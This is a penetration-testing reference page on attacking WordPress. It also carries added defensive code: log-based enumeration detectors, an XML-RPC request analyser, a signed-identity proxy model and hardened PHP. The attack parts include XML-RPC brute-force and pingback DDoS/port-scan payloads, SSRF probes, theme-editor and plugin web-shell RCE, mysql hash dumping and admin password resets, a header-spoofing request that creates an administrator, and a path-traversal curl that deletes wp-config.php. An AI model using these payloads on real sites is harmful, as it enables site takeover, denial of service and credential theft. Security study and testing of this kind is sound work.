Wordpress
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
- Uploaded files go to: http://10.10.10.10/wp-content/uploads/2018/08/a.txt
- Theme files can be found in /wp-content/themes/, so if you modify some PHP of the theme to get RCE you will probably use that path. For example: using the theme twentytwelve you can access the 404.php file at: /wp-content/themes/twentytwelve/404.php
- Another useful URL could be: /wp-content/themes/default/404.php
- In wp-config.php you can find the root password of the database.
- Default login paths to check: /wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/
Main WordPress Files
- index.php
- license.txt contains useful information such as the installed WordPress version.
- wp-activate.php is used for the email activation process when setting up a new WordPress site.
- Login folders (may be renamed to hide them):
  /wp-admin/login.php
  /wp-admin/wp-login.php
  /login.php
  /wp-login.php
- xmlrpc.php is a file that represents a WordPress feature allowing data to be transmitted with HTTP as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress REST API.
- The wp-content folder is the main directory where plugins and themes are stored.
- wp-content/uploads/ is the directory where any files uploaded to the platform are stored.
- wp-includes/ is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.
- wp-sitemap.xml: in WordPress versions 5.5 and later, WordPress generates a sitemap XML file with all public posts and publicly queryable post types and taxonomies.
Post exploitation
- The wp-config.php file contains the information required by WordPress to connect to the database, such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to enable DEBUG mode, which can be helpful in troubleshooting.
Users Permissions
- Administrator
- Editor: publishes and manages their own and others' posts
- Author: publishes and manages their own posts
- Contributor: writes and manages their posts but cannot publish them
- Subscriber: browses posts and edits their profile
Passive Enumeration
Get WordPress version
Check if you can find the files /license.txt or /readme.html
Inside the source code of the page (example from https://wordpress.org/support/article/pages/):
- grep:
```bash
curl https://victim.com/ | grep 'content="WordPress'
```
- meta name
- CSS link files
- JavaScript files
Get Plugins
```bash
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
Get Themes
```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
Extract versions in general
```bash
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '\?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
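As an added example (not part of the original page), the following Python script does in one pass what the three curl pipelines above do: it parses a page's HTML and collects the generator meta tag, plugin and theme slugs from /wp-content/ asset URLs, and the ?ver= query values. The HTML is a constructed sample, not a response from wordpress.org; many hardened sites strip the generator tag, in which case only the asset versions remain.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Constructed sample HTML, modelled on what a WordPress front page serves (not a real site).
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 6.4.2" />
<link rel="stylesheet" href="https://example.test/wp-content/themes/twentytwelve/style.css?ver=4.1" />
<link rel="stylesheet" href="https://example.test/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8.4" />
<script src="https://example.test/wp-includes/js/jquery/jquery.min.js?ver=3.7.1"></script>
<script src="https://example.test/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=8.4.0"></script>
</head><body></body></html>"""


class WPAssetParser(HTMLParser):
    """Collects the <meta name="generator"> content and href/src URLs of link/script/img tags."""

    def __init__(self):
        super().__init__()
        self.generator = None
        self.urls = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and a.get("name", "").lower() == "generator":
            self.generator = a.get("content")
        elif tag in ("link", "script", "img"):
            url = a.get("href") or a.get("src")
            if url:
                self.urls.append(url)


PLUGIN_RE = re.compile(r"/wp-content/plugins/([^/?#]+)")
THEME_RE = re.compile(r"/wp-content/themes/([^/?#]+)")


def fingerprint(html):
    """Return core version (if the generator tag is present), plugin and theme slugs with the
    first ?ver= seen for each, and every asset path that carried a ?ver= value."""
    parser = WPAssetParser()
    parser.feed(html)
    result = {"core_version": None, "plugins": {}, "themes": {}, "asset_versions": {}}
    if parser.generator:
        m = re.search(r"WordPress\s+([\d.]+)", parser.generator)
        if m:
            result["core_version"] = m.group(1)
    for url in parser.urls:
        parsed = urlparse(url)
        ver = parse_qs(parsed.query).get("ver", [None])[0]
        for regex, bucket in ((PLUGIN_RE, "plugins"), (THEME_RE, "themes")):
            m = regex.search(url)
            if m:
                # keep the first version seen per slug; None when the asset had no ?ver=
                result[bucket].setdefault(m.group(1), ver)
        if ver:
            result["asset_versions"][parsed.path] = ver
    return result


if __name__ == "__main__":
    for key, value in fingerprint(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

The ?ver= value on a plugin asset is usually, but not always, the plugin version (a developer may pin it to the core version or a build number), so treat it as a hint to confirm against the plugin's readme.txt rather than as ground truth.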
Active Enumeration
Plugins and Themes
You probably won't be able to find all the possible Plugins and Themes. In order to discover all of them, you will need to actively Brute Force a list of Plugins and Themes (hopefully for us there are automated tools that contain these lists).
Users
- ID Brute: You get valid users from a WordPress site by Brute Forcing user IDs:
```bash
curl -s -I -X GET http://blog.example.com/?author=1
```
If the responses are 200 or 30X, that means the id is valid. If the response is 400, then the id is invalid.
- wp-json: You can also try to get information about the users by querying:
```bash
curl http://blog.example.com/wp-json/wp/v2/users
```
Another /wp-json/ endpoint that can reveal some information about users is:
```bash
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
```
Note that this endpoint only exposes users that have made a post. Only information about the users that have this feature enabled will be provided.
Also note that /wp-json/wp/v2/pages could leak IP addresses.
- Login username enumeration: when logging in at /wp-login.php the error message differs, indicating whether the username exists or not.
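Added example, not from the original page: the enumeration requests above leave a recognisable trace in the web server access log, and the script below applies the page's own rule (200 or 30x means a valid author ID) to flag a client that probes several ?author=N values inside a short window, and any request to /wp-json/wp/v2/users. The log lines are constructed for the example; the addresses and timestamps are not real.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed access-log lines in Apache/nginx "combined" format (not from a real server).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:13:55:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "curl/8.4.0"
203.0.113.5 - - [10/Mar/2024:13:55:01 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "curl/8.4.0"
203.0.113.5 - - [10/Mar/2024:13:55:02 +0000] "GET /?author=3 HTTP/1.1" 404 2310 "-" "curl/8.4.0"
203.0.113.5 - - [10/Mar/2024:13:55:02 +0000] "GET /?author=4 HTTP/1.1" 404 2310 "-" "curl/8.4.0"
203.0.113.5 - - [10/Mar/2024:13:55:03 +0000] "GET /?author=5 HTTP/1.1" 301 0 "-" "curl/8.4.0"
203.0.113.5 - - [10/Mar/2024:13:55:04 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 1432 "-" "curl/8.4.0"
198.51.100.7 - - [10/Mar/2024:13:56:10 +0000] "GET /?author=1 HTTP/1.1" 301 0 "https://example.test/" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:14:20:00 +0000] "GET /blog/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
AUTHOR_RE = re.compile(r"^/\?author=(\d+)$")
USERS_RE = re.compile(r"^/wp-json/wp/v2/users(?:[/?].*)?$")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_user_enumeration(log_text, window=timedelta(minutes=5), min_ids=3):
    """Flag clients probing at least `min_ids` distinct ?author=N IDs within `window`,
    plus any hit on the REST users listing. Returns a list of finding dicts."""
    probes = defaultdict(list)  # ip -> [(timestamp, author_id, status)]
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        m = AUTHOR_RE.match(rec["path"])
        if m:
            probes[rec["ip"]].append((rec["ts"], int(m.group(1)), rec["status"]))
        elif USERS_RE.match(rec["path"]):
            findings.append({"ip": rec["ip"], "type": "rest_users_listing", "status": rec["status"]})
    for ip, events in probes.items():
        events.sort()
        for t0, _, _ in events:  # sliding window anchored at each probe
            in_window = [e for e in events if t0 <= e[0] <= t0 + window]
            ids = {e[1] for e in in_window}
            if len(ids) >= min_ids:
                # 200 / 30x means the ID resolved to a real author archive (the page's rule)
                valid = sorted({e[1] for e in in_window if e[2] == 200 or 300 <= e[2] < 400})
                findings.append({"ip": ip, "type": "author_id_bruteforce",
                                 "ids_probed": len(ids), "valid_ids": valid})
                break
    return findings


if __name__ == "__main__":
    for f in detect_user_enumeration(SAMPLE_LOG):
        print(f)
```

The valid_ids list is the same information the attacker gathered, so the finding tells you which accounts were confirmed and should be watched for follow-on login attempts; the REST listing finding is worth acting on even as a single request, since one response discloses every author at once.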
XML-RPC
If xmlrpc.php is active you can perform a credentials brute-force or use it to launch DoS attacks against other resources. (You can automate this process using this for example).
To see if it is active try to access /xmlrpc.php and send this request:
Check
```xml
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
```
Credentials Bruteforce
wp.getUsersBlogs, wp.getCategories or metaWeblog.getUsersBlogs are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:
```xml
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
```
The message "Incorrect username or password" inside a 200 code response should appear if the credentials aren't valid.
Using the correct credentials you can upload a file. In the response the path will appear (https://gist.github.com/georgestephanis/5681982)
```xml
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
```
There is also a faster way to brute-force credentials using system.multicall, as you can try several credentials in the same request:
Bypass 2FA
This method is meant for programs and not for humans, and it's old, therefore it doesn't support 2FA. So, if you have valid creds but the main entrance is protected by 2FA, you might be able to abuse xmlrpc.php to login with those creds bypassing 2FA. Note that you won't be able to perform all the actions you can do through the console, but you might still be able to get to RCE as Ippsec explains it in https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s
DDoS or port scanning
If you can find the method pingback.ping inside the list you can make the Wordpress send an arbitrary request to any host/port.
This can be used to ask thousands of Wordpress sites to access one location (so a DDoS is caused in that location) or you can use it to make Wordpress scan some internal network (you can indicate any port).
```xml
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
```
If you get faultCode with a value greater than 0 (17), it means the port is open.
Take a look at the use of system.multicall in the previous section to learn how to abuse this method to cause DDoS.
DDoS
```xml
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target/</string></value></param>
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
</params>
</methodCall>
```
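Added example (not from the original page) serving both the system.multicall credential brute-force above and the pingback.ping port-scan abuse: a parser for XML-RPC request bodies that flattens system.multicall into its inner calls, counts login-bearing calls per request, and flags pingback.ping whose first argument points at a private, loopback or link-local address. The request bodies are constructed here, not captured traffic; the username parameter positions are the documented ones for the three methods the page names, and the spray threshold of five is an assumption.

```python
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Methods the page lists as usable for credential guessing -> index of the username parameter
# (wp.getUsersBlogs(user, pass); wp.getCategories(blog_id, user, pass);
#  metaWeblog.getUsersBlogs(appkey, user, pass)).
CREDENTIAL_METHODS = {"wp.getUsersBlogs": 0, "wp.getCategories": 1, "metaWeblog.getUsersBlogs": 1}


def _text(value_el):
    """Scalar text of an XML-RPC <value>, with or without a type wrapper such as <string>."""
    if value_el is None:
        return ""
    children = list(value_el)
    return (children[0].text if children else value_el.text) or ""


def _array_values(value_el):
    """The <value> children of an XML-RPC <array>, or [] when there is none."""
    data = value_el.find("array/data") if value_el is not None else None
    return list(data.findall("value")) if data is not None else []


def expand_calls(body):
    """Yield (methodName, [param <value> elements]); system.multicall is flattened into its members."""
    root = ET.fromstring(body)
    method = root.findtext("methodName")
    params = [p.find("value") for p in root.findall("params/param")]
    if method != "system.multicall" or not params:
        yield method, params
        return
    for call in _array_values(params[0]):
        struct = call.find("struct")
        if struct is None:
            continue
        members = {m.findtext("name"): m.find("value") for m in struct.findall("member")}
        yield _text(members.get("methodName")), _array_values(members.get("params"))


def _targets_internal_host(url):
    """True when the URL host is a private, loopback or link-local address (internal scan)."""
    host = urlparse(url).hostname or ""
    try:
        ip = ipaddress.ip_address(host)
        return ip.is_private or ip.is_loopback or ip.is_link_local
    except ValueError:
        return host == "localhost" or host.endswith(".local")


def analyze_xmlrpc(body, spray_threshold=5):
    """Findings for one request: multicall credential spraying and pingback.ping targets."""
    calls = list(expand_calls(body))
    findings = []
    cred = [(name, params) for name, params in calls if name in CREDENTIAL_METHODS]
    if len(cred) >= spray_threshold:
        users = {_text(params[CREDENTIAL_METHODS[name]]) for name, params in cred
                 if len(params) > CREDENTIAL_METHODS[name]}
        findings.append({"type": "multicall_credential_spray", "attempts": len(cred),
                         "usernames": sorted(users)})
    for name, params in calls:
        if name == "pingback.ping" and params:
            target = _text(params[0])
            kind = "pingback_internal_target" if _targets_internal_host(target) else "pingback"
            findings.append({"type": kind, "target": target})
    return findings


def _call_struct(method, *params):
    """Build one member of a system.multicall array (helper for the constructed samples)."""
    vals = "".join(f"<value><string>{p}</string></value>" for p in params)
    return ("<value><struct><member><name>methodName</name>"
            f"<value><string>{method}</string></value></member>"
            f"<member><name>params</name><value><array><data>{vals}</data></array></value></member>"
            "</struct></value>")


# Constructed request bodies (not captured traffic): six guesses for 'admin' plus a pingback
# aimed at a private address, and the page's single-call login probe for comparison.
SAMPLE_MULTICALL = (
    "<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>"
    + "".join(_call_struct("wp.getUsersBlogs", "admin", f"guess{i}") for i in range(6))
    + _call_struct("pingback.ping", "http://10.0.0.5:22/", "https://example.test/?p=1")
    + "</data></array></value></param></params></methodCall>"
)
SAMPLE_SINGLE = ("<methodCall><methodName>wp.getUsersBlogs</methodName><params>"
                 "<param><value>admin</value></param><param><value>pass</value></param>"
                 "</params></methodCall>")

if __name__ == "__main__":
    print(analyze_xmlrpc(SAMPLE_MULTICALL))
    print(analyze_xmlrpc(SAMPLE_SINGLE))
```

Because the whole spray arrives in one HTTP request, per-request rate limits on /xmlrpc.php never fire; counting the inner calls, as done here, is what makes the multicall variant visible. Disabling system.multicall and pingback.ping (or xmlrpc.php entirely where no client needs it) removes both findings at the source.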
wp-cron.php DoS
This file usually exists under the root of the Wordpress site: /wp-cron.php
When this file is accessed a "heavy" MySQL query is performed, so it could be used by attackers to cause a DoS.
Also, by default, wp-cron.php is called on every page load (whenever a client requests any Wordpress page), which on high-traffic sites can cause problems (DoS).
It is recommended to disable Wp-Cron and create a real cronjob inside the host that performs the needed actions at regular intervals (without causing issues).
/wp-json/oembed/1.0/proxy - SSRF
Try to access https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net and the Wordpress site may make a request to you.
https://github.com/t0gu/quickpress/blob/master/core/requests.go
This tool checks whether the methodName: pingback.ping and the path /wp-json/oembed/1.0/proxy exist; if they do, it tries to exploit them.
Automatic Tools
```bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"
```
Get access by overwriting a bit
More than a real attack this is a curiosity. In the CTF https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man you could flip 1 bit from any wordpress file. So you could flip the position 5389 of the file /var/www/html/wp-includes/user.php to NOP the NOT (!) operation.
```php
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
```
Panel RCE
Modifying a php from the theme used (admin credentials needed)
Appearance → Theme Editor → 404 Template (at the right)
Change the content for a php shell:
Search on the internet how you can access that updated page. In this case you have to access here: http://10.11.1.234/wp-content/themes/twentytwelve/404.php
MSF
You can use:
```
use exploit/unix/webapp/wp_admin_shell_upload
```
to get a session.
Plugin RCE
PHP plugin
It may be possible to upload .php files as a plugin.
Create your php backdoor using for example:
Then add a new plugin:
Upload the plugin and press Install Now:
Click on Proceed:
Probably this won't apparently do anything, but if you go to Media, you will see your shell uploaded:
Access it and you will see the URL to execute the reverse shell:
Uploading and activating malicious plugin
This method involves the installation of a malicious plugin known to be vulnerable and can be exploited to obtain a web shell. This process is carried out through the WordPress dashboard as follows:
- Plugin Acquisition: The plugin is obtained from a source like Exploit DB like here.
- Plugin Installation:
  - Navigate to the WordPress dashboard, then go to Dashboard > Plugins > Upload Plugin.
  - Upload the zip file of the downloaded plugin.
- Plugin Activation: Once the plugin is successfully installed, it must be activated through the dashboard.
- Exploitation:
  - With the plugin "reflex-gallery" installed and activated, it can be exploited as it is known to be vulnerable.
  - The Metasploit framework provides an exploit for this vulnerability. By loading the appropriate module and executing specific commands, a meterpreter session can be established, granting unauthorized access to the site.
  - It's noted that this is just one of the many methods to exploit a WordPress site.
The content includes visual aids depicting the steps in the WordPress dashboard for installing and activating the plugin. However, it's important to note that exploiting vulnerabilities in this manner is illegal and unethical without proper authorization. This information should be used responsibly and only in a legal context, such as penetration testing with explicit permission.
For more detailed steps check: https://www.hackingarticles.in/wordpress-reverse-shell/
From XSS to RCE
- WPXStrike: WPXStrike is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other critical vulnerabilities in WordPress. For more info check this post. It provides support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:
- Privilege Escalation: Creates a user in WordPress.
- (RCE) Custom Plugin (backdoor) Upload: Upload your custom plugin (backdoor) to WordPress.
- (RCE) Built-In Plugin Edit: Edit Built-In Plugins in WordPress.
- (RCE) Built-In Theme Edit: Edit Built-In Themes in WordPress.
- (Custom) Custom Exploits: Custom Exploits for Third-Party WordPress Plugins/Themes.
Post Exploitation
Extract usernames and passwords:
```bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
```
Change admin password:
```bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
```
Wordpress Plugins Pentest
Attack Surface
Knowing how a Wordpress plugin can expose functionality is key to finding vulnerabilities in its functionality. You can find how a plugin might expose functionality in the following points and some examples of vulnerable plugins in this blog post.
wp_ajax
One of the ways a plugin can expose functions to users is via AJAX handlers. These could contain logic, authorization, or authentication bugs. Moreover, it's quite common for these functions to base both authentication and authorization on the presence of a wordpress nonce that any user authenticated in the Wordpress instance might have (independently of its role).
These are the functions that can be used to expose a function in a plugin:
```php
add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
```
The use of nopriv makes the endpoint accessible to any user (even unauthenticated ones).
caution
Moreover, if the function is only checking the authorization of the user with the function wp_verify_nonce, this function is just checking that the user is logged in; it usually isn't checking the role of the user. So low-privileged users might have access to high-privileged actions.
- REST API
It's also possible to expose functions from wordpress by registering a REST API using the register_rest_route function:
```php
register_rest_route(
    $this->namespace, '/get/', array(
        'methods' => WP_REST_Server::READABLE,
        'callback' => array($this, 'getData'),
        'permission_callback' => '__return_true'
    )
);
```
The permission_callback is a callback function that checks whether a given user is authorized to call the API method.
If the built-in __return_true function is used, it will simply skip the user permissions check.
- Direct access to the php file
Of course, Wordpress uses PHP and files inside plugins are directly accessible from the web. So, in case a plugin exposes any vulnerable functionality that is triggered just by accessing the file, it's going to be exploitable by any user.
Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)
Some plugins implement "trusted header" shortcuts for internal integrations or reverse proxies and then use that header to set the current user context for REST requests. If the header is not cryptographically bound to the request by an upstream component, an attacker can spoof it and hit privileged REST routes as an administrator.
- Impact: unauthenticated privilege escalation to admin by creating a new administrator via the core users REST route.
- Example header: X-Wcpay-Platform-Checkout-User: 1 (forces user ID 1, typically the first administrator account).
- Exploited route: POST /wp-json/wp/v2/users with an elevated role array.
PoC
```http
POST /wp-json/wp/v2/users HTTP/1.1
Host: <WP HOST>
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
X-Wcpay-Platform-Checkout-User: 1
Content-Length: 114

{"username": "honeypot", "email": "wafdemo@patch.stack", "password": "demo", "roles": ["administrator"]}
```
Why it works
- The plugin maps a client-controlled header to authentication state and skips capability checks.
- WordPress core expects the create_users capability for this route; the plugin hack bypasses it by setting the current user context directly from the header.
Expected success indicators
- HTTP 201 with a JSON body describing the created user.
- A new admin user visible in wp-admin/users.php.
Detection checklist
- Grep for getallheaders(), $_SERVER['HTTP_...'], or vendor SDKs reading custom headers to set user context (e.g., wp_set_current_user(), wp_set_auth_cookie()).
- Review REST registrations for privileged callbacks that lack robust permission_callback checks and rely on request headers instead.
- Look for uses of core user-management functions (wp_insert_user, wp_create_user) in REST handlers that are gated only by header values.
Hardening
- Never derive authentication or authorization from client-controlled headers.
- If a reverse proxy must inject identity, bind trust to the proxy and strip inbound copies (e.g., unset X-Wcpay-Platform-Checkout-User at the edge), then pass a signed token and verify it server-side.
- For REST routes performing privileged actions, enforce current_user_can() checks and a strict permission_callback (do NOT use __return_true).
- Prefer first-party auth (cookies, application passwords, OAuth) over header "impersonation".
References: see the links at the end of this page for the public case and broader analysis.
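To make the hardening bullets concrete, here is an added Python model (not code from WooCommerce Payments or WordPress) of the recommended design: the proxy strips every inbound copy of an identity header, attaches a short-lived HMAC-signed token, and the application accepts that token only when the request arrived from the proxy's address. The proxy address, the secret, the header name X-Internal-User and the 60-second validity window are assumptions for the example; the header X-Wcpay-Platform-Checkout-User is the one the page describes and is dropped unconditionally.

```python
import hashlib
import hmac
import time

TRUSTED_PROXIES = {"10.0.0.2"}                        # assumed address of the reverse proxy
SHARED_SECRET = b"example-shared-secret"              # constructed; load from a secrets store in practice
IDENTITY_HEADER = "X-Internal-User"                   # hypothetical signed-identity header
LEGACY_HEADERS = {"X-Wcpay-Platform-Checkout-User"}   # client-trusted header from the page, always dropped
MAX_AGE_SECONDS = 60


def sign_identity(user_id, issued_at, secret=SHARED_SECRET):
    """HMAC-SHA256 over 'user_id:issued_at' so the token cannot be forged or re-pointed."""
    return hmac.new(secret, f"{user_id}:{issued_at}".encode(), hashlib.sha256).hexdigest()


def make_token(user_id, now=None):
    """Token the proxy attaches after it has authenticated the caller itself."""
    ts = int(now if now is not None else time.time())
    return f"{user_id}:{ts}:{sign_identity(user_id, ts)}"


def edge_strip(headers):
    """First proxy step: drop any client-supplied copy of identity headers."""
    return {k: v for k, v in headers.items() if k not in LEGACY_HEADERS and k != IDENTITY_HEADER}


def proxy_forward(client_headers, authenticated_user_id, now=None):
    """Edge behaviour: strip inbound identity headers, then attach a fresh signed token (if any)."""
    forwarded = edge_strip(client_headers)
    if authenticated_user_id is not None:
        forwarded[IDENTITY_HEADER] = make_token(authenticated_user_id, now)
    return forwarded


def resolve_user(remote_addr, headers, now=None):
    """Application side: the user ID asserted by a valid, fresh token from a trusted proxy, else None.
    Anything that fails resolves to the anonymous user rather than to a guess."""
    now = now if now is not None else time.time()
    if remote_addr not in TRUSTED_PROXIES:      # direct clients never get to assert identity
        return None
    token = headers.get(IDENTITY_HEADER)
    if not token:
        return None
    parts = token.split(":")
    if len(parts) != 3 or not parts[0].isdigit() or not parts[1].isdigit():
        return None
    user_id, ts, sig = parts[0], int(parts[1]), parts[2]
    if abs(now - ts) > MAX_AGE_SECONDS:         # replayed or stale token
        return None
    if not hmac.compare_digest(sig, sign_identity(user_id, ts)):  # constant-time comparison
        return None
    return int(user_id)


if __name__ == "__main__":
    now = int(time.time())
    spoof = {"X-Wcpay-Platform-Checkout-User": "1", "Host": "shop.example"}
    print("direct spoof ->", resolve_user("203.0.113.9", spoof, now))               # None
    print("via proxy, unauthenticated ->", resolve_user("10.0.0.2", proxy_forward(spoof, None, now), now))  # None
    print("via proxy, authenticated as 7 ->", resolve_user("10.0.0.2", proxy_forward(spoof, 7, now), now))  # 7
```

Even with this in place the REST route still needs its own permission_callback: the token only establishes who the caller is, and current_user_can('create_users') decides what that caller may do.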
Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0)
WordPress themes and plugins frequently expose AJAX handlers through the wp_ajax_ and wp_ajax_nopriv_ hooks. When the nopriv variant is used the callback becomes reachable by unauthenticated visitors, so any sensitive action must additionally implement:
- A capability check (e.g. current_user_can() or at least is_user_logged_in()), and
- A CSRF nonce validated with check_ajax_referer() / wp_verify_nonce(), and
- Strict input sanitisation / validation.
The Litho multipurpose theme (< 3.1) forgot those 3 controls in the Remove Font Family feature and ended up shipping the following code (simplified):
```php
function litho_remove_font_family_action_data() {
    if ( empty( $_POST['fontfamily'] ) ) {
        return;
    }
    $fontfamily = str_replace( ' ', '-', $_POST['fontfamily'] );
    $upload_dir = wp_upload_dir();
    $srcdir     = untrailingslashit( wp_normalize_path( $upload_dir['basedir'] ) ) . '/litho-fonts/' . $fontfamily;
    $filesystem = Litho_filesystem::init_filesystem();
    if ( file_exists( $srcdir ) ) {
        $filesystem->delete( $srcdir, FS_CHMOD_DIR );
    }
    die();
}
add_action( 'wp_ajax_litho_remove_font_family_action_data', 'litho_remove_font_family_action_data' );
add_action( 'wp_ajax_nopriv_litho_remove_font_family_action_data', 'litho_remove_font_family_action_data' );
```
Issues introduced by this snippet:
- Unauthenticated access – the wp_ajax_nopriv_ hook is registered.
- No nonce / capability check – any visitor can hit the endpoint.
- No path sanitisation – the user-controlled fontfamily string is concatenated into a filesystem path without filtering, allowing classic ../../ traversal.
Exploitation
An attacker can delete any file or directory below the uploads base directory (normally <wp-root>/wp-content/uploads/) by sending a single HTTP POST request:
```bash
curl -X POST https://victim.com/wp-admin/admin-ajax.php \
  -d 'action=litho_remove_font_family_action_data' \
  -d 'fontfamily=../../../../wp-config.php'
```
Because wp-config.php is outside uploads, a four-level ../ sequence is enough on a default installation. Deleting wp-config.php forces WordPress into the installation wizard on the next visit, enabling a full site takeover (the attacker just supplies a new DB config and creates an admin user).
Other impactful targets are plugin/theme .php files (to break security plugins) or .htaccess rules.
Detection checklist
- Any add_action( 'wp_ajax_nopriv_...') callback that calls filesystem helpers (copy(), unlink(), $wp_filesystem->delete(), etc.).
- Concatenation of unsanitised user input into file paths (look for $_POST, $_GET, $_REQUEST).
- Absence of check_ajax_referer() and current_user_can() / is_user_logged_in().
Hardening
```php
function secure_remove_font_family() {
    // Authentication + authorisation: only logged-in users with a suitable capability
    // (edit_theme_options is used here as an example; pick the capability that fits the feature)
    if ( ! is_user_logged_in() || ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'forbidden', 403 ); // wp_send_json_error() exits
    }
    // CSRF protection: the nonce must match the one rendered in the admin UI
    check_ajax_referer( 'litho_fonts_nonce' );
    // Input sanitisation: sanitize_file_name() strips path separators and '..'
    $fontfamily = sanitize_file_name( wp_unslash( $_POST['fontfamily'] ?? '' ) );
    if ( '' === $fontfamily ) {
        wp_send_json_error( 'missing fontfamily', 400 );
    }
    // Path containment: realpath() resolves symlinks and returns false for a missing path;
    // compare against the base directory including its trailing slash so that a sibling
    // directory sharing the prefix (e.g. uploads-evil) is not accepted
    $basedir = realpath( wp_upload_dir()['basedir'] );
    $srcdir  = $basedir ? realpath( trailingslashit( $basedir ) . 'litho-fonts/' . $fontfamily ) : false;
    if ( false === $basedir || false === $srcdir || ! str_starts_with( $srcdir, trailingslashit( $basedir ) ) ) {
        wp_send_json_error( 'invalid path', 400 );
    }
    // … proceed …
}
add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_family' );
// 🔒 NO wp_ajax_nopriv_ registration
```
tip
Always treat any write/delete operation on disk as privileged and double-check:
• Authentication • Authorisation • Nonce • Input sanitisation • Path containment (e.g. via realpath() plus str_starts_with()).
